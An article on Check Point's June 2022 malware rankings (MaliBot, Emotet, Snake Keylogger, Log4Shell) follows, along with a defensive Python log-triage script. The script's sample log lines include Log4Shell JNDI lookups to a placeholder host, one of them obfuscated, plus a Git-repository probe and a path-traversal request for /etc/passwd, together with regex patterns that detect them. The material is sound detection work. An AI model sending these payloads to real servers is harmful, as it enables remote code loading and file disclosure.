MaliBot came to widespread attention in June 2022, having been discovered by F5 Labs researchers in the course of their work on FluBot. At the time it was targeting mainly online banking customers in Italy and Spain, but its capabilities make it a relevant threat to Android users the world over.
Android users should be cautious as the MaliBot malware is becoming a persistent and pervasive issue, warns Check Point. The latest monthly Global Threat Index from Check Point Research identifies the recently discovered Android malware MaliBot as one of the most pervasive risks to end users. It appeared suddenly over the past few weeks and has since surpassed AlienBot and Anubis to rank third among mobile malware threats, filling the void left by the takedown of FluBot in May.
“While it’s always good to see law enforcement successful in bringing down cyber crime groups or malwares like FluBot, sadly it didn’t take long for a new mobile malware to take its place,” said Maya Horowitz, vice-president of research at Check Point Software.
According to F5, it disguises itself as a cryptocurrency mining app but in fact steals financial information, credentials, cryptocurrency wallets and personal data. It is also capable of stealing and bypassing multifactor authentication (MFA) codes. Its command and control (C2) infrastructure is located in Russia, and it appears to have links to the Sality and Sova malware families. It is distributed by luring victims to fraudulent websites that encourage them to download the malware, or by smishing, presenting victims with a QR code that leads to the malicious APK.
Meanwhile, Emotet unsurprisingly retained the top spot as the most prevalent overall malware found in the wild, although Snake Keylogger, an infostealer, continues its meteoric rise, moving up to third having entered Check Point’s monthly chart at number eight only the month before. Having initially been spread via malicious PDF files, more recent Snake campaigns have seen it arrive in Word documents disguised as requests for quotations. Emotet also seems to be changing its tactics, with a new variant reported last month that targets Google Chrome users and now includes credit card data theft.
“Cyber criminals are well aware of the central role that mobile devices play in many people’s lives and are always adapting and improving their tactics to match. The threat landscape is evolving rapidly, and mobile malware is a significant danger for both personal and enterprise security. It’s never been more important to have a robust mobile threat prevention solution in place.”
Once again, the most exploited vulnerability in June 2022 was CVE-2021-44228, or Log4Shell, in Apache Log4j, which impacted 43% of organisations worldwide; exploitation of it shows no sign of slowing. In second place was an information disclosure vulnerability in web servers that expose their Git repository, and in third a series of URL directory traversal vulnerabilities on various web servers. More detail on all of these is available from Check Point Research.
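All three of the most exploited issues in the index leave recognisable traces in ordinary web server access logs. The script below is an added example, not code from Check Point or from the article, showing a minimal triage pass over combined-format log lines that flags Log4Shell JNDI lookups (including the `${lower:..}` obfuscation seen in the wild), probes for an exposed `/.git/` directory, and URL directory traversal. The log lines are constructed for the example; the field layout follows the common Apache/Nginx combined format. It assumes the attacker-controlled strings appear in the request path, referer or user agent, which is where the combined format records them; Log4Shell payloads sent in other headers are not visible in such logs.

```python
"""Access-log triage for the three exploitation patterns named in the June 2022
Check Point index. Added example with constructed sample data; not real traffic."""
import re
from urllib.parse import unquote

# Constructed sample lines (combined log format). Not taken from any report.
SAMPLE_LOG = """\
203.0.113.10 - - [12/Jun/2022:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.11 - - [12/Jun/2022:10:01:05 +0000] "GET /api/v1/status HTTP/1.1" 200 88 "-" "${jndi:ldap://198.51.100.7:1389/a}"
203.0.113.12 - - [12/Jun/2022:10:01:09 +0000] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "python-requests/2.27"
203.0.113.13 - - [12/Jun/2022:10:01:12 +0000] "GET /static/..%2f..%2f..%2fetc/passwd HTTP/1.1" 404 0 "-" "curl/7.81"
203.0.113.14 - - [12/Jun/2022:10:01:15 +0000] "GET /login?u=${${lower:j}ndi:rmi://198.51.100.7/x} HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [time] "method path proto" status size "referer" "ua"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>\S+)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# ${lower:j}ndi / ${upper:J}NDI wrappers used to hide the literal "jndi" token.
OBFUSCATION_RE = re.compile(r'\$\{(?:lower|upper):([^}]*)\}')

# "../" or "..\" as its own path segment, after URL decoding.
TRAVERSAL_RE = re.compile(r'(?:^|[/\\])\.\.(?:[/\\]|$)')


def normalise(s):
    """Undo double URL-encoding, lower-case, and strip ${lower:..}/${upper:..} wrappers."""
    s = unquote(unquote(s)).lower()
    return OBFUSCATION_RE.sub(r'\1', s)


def classify(line):
    """Return (ip, status, findings) for one log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    f = m.groupdict()
    status = int(f['status'])
    path = normalise(f['path'])
    # Log4Shell payloads land in any logged string field, so search all of them.
    everything = ' '.join(normalise(f[k]) for k in ('path', 'referer', 'ua'))

    findings = []
    if '${jndi:' in everything:
        findings.append('log4shell')
    if '/.git/' in path:
        # A 200 on /.git/* means the repository really is exposed; anything
        # else is just a scanner probing for it.
        findings.append('git-repo-exposed' if status == 200 else 'git-repo-probe')
    if TRAVERSAL_RE.search(path):
        findings.append('dir-traversal')
    return f['ip'], status, findings


def triage(log_text):
    """Return only the lines that produced at least one finding."""
    hits = []
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        result = classify(line)
        if result and result[2]:
            hits.append(result)
    return hits


if __name__ == '__main__':
    for ip, status, findings in triage(SAMPLE_LOG):
        print(f'{ip} {status} {", ".join(findings)}')
```

The status code matters for the Git case: a scanner requesting `/.git/HEAD` is routine background noise, but a `200` on that path means the repository, and often credentials or source, is actually being served and the host needs fixing rather than just blocking.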